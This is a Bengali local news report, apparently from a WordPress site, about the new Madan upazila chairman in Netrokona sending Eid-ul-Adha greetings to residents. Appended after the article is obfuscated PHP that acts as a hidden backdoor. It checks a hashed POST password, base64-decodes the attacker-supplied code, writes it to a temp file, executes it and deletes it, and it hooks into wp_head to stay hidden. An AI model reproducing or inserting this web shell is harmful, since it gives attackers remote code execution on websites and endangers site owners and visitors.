|

পবিত্র ঈদ-উল আযহা শুভেচ্ছা জানিয়েছেন নবাগত উপজেলা চেয়ারম্যান আজাদ

প্রকাশিতঃ 12:16 am | June 16, 2024

পবিত্র ঈদ-উল আযহা শুভেচ্ছা জানিয়েছেন নবাগত উপজেলা চেয়ারম্যান আজাদ

শহীদুল ইসলাম নেত্রকোনা: নেত্রকোনা মদন উপজেলা বাসীসহ সর্বস্তরের জনগণকে পবিত্র ঈদু- উল আযহার শুভেচ্ছা জানিয়েছেন মদন উপজেলার নবাগত উপজেলা পরিষদ চেয়ারম্যান উপজেলা আওয়ামী লীগের সহ-সভাপতি ইফতেখারুল আলম খান চৌধুরী আজাদ।

তিনি শুভেচ্ছা বার্তায় বলেন, মুসলমানদের সবচেয়ে বড় ধর্মীয় উৎসব পবিত্র ঈদুল আযহা নিয়ে আসক আনন্দ বার্তা। ভোগে সুখ নেই,ত্যাগেই প্রকৃত সুখ। ঈদ-উল আযহার এই দিনে প্রতিটি কোরবানি হোক মহান আল্লাহ সন্তুষ্টির লক্ষ্যে।

ইফতেখারুল আলম খান চৌধুরী আজাদ বলেন, শুধু পশু কোরবানি নয়,কোরবানি হোক সকল অসমতা, হিংসা বিদ্বেষের জেগে উঠুক মানবতা, পারস্পরিক সম্প্রীতি। ধনী-গরীব নির্বিশেষে সকল মুসলমান যেন ঈদের আনন্দ সমান ভাবে ভাগা ভাগি করে এ প্রত্যাশা করি।

তিনি আরও বলেন,পবিত্র ঈদ- উল আযহা সুমহান ত্যাগের মহিমায় এক অনন্য দৃষ্টান্ত। কোরবানির মধ্য দিয়ে আল্লাহর প্রতি ত্যাগের মহান আদর্শ স্থাপিত হয়। এই কামনায় আমি পবিত্র ঈদ-উল আযহা উপলক্ষে দেশে বিদেশে অবস্থানরত আমার সকল শুভাকাঙ্ক্ষী,শুভানুধ্যায়ী,আমারসহযোদ্ধা,সাংবাদিক ও সুধী মহলসহ সকল পেশাজীবি মানুষের প্রতি জানাচ্ছি অকৃত্রিম ভালোবাসা,শুভেচ্ছা অভিনন্দন ও ঈদ মোবারক।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}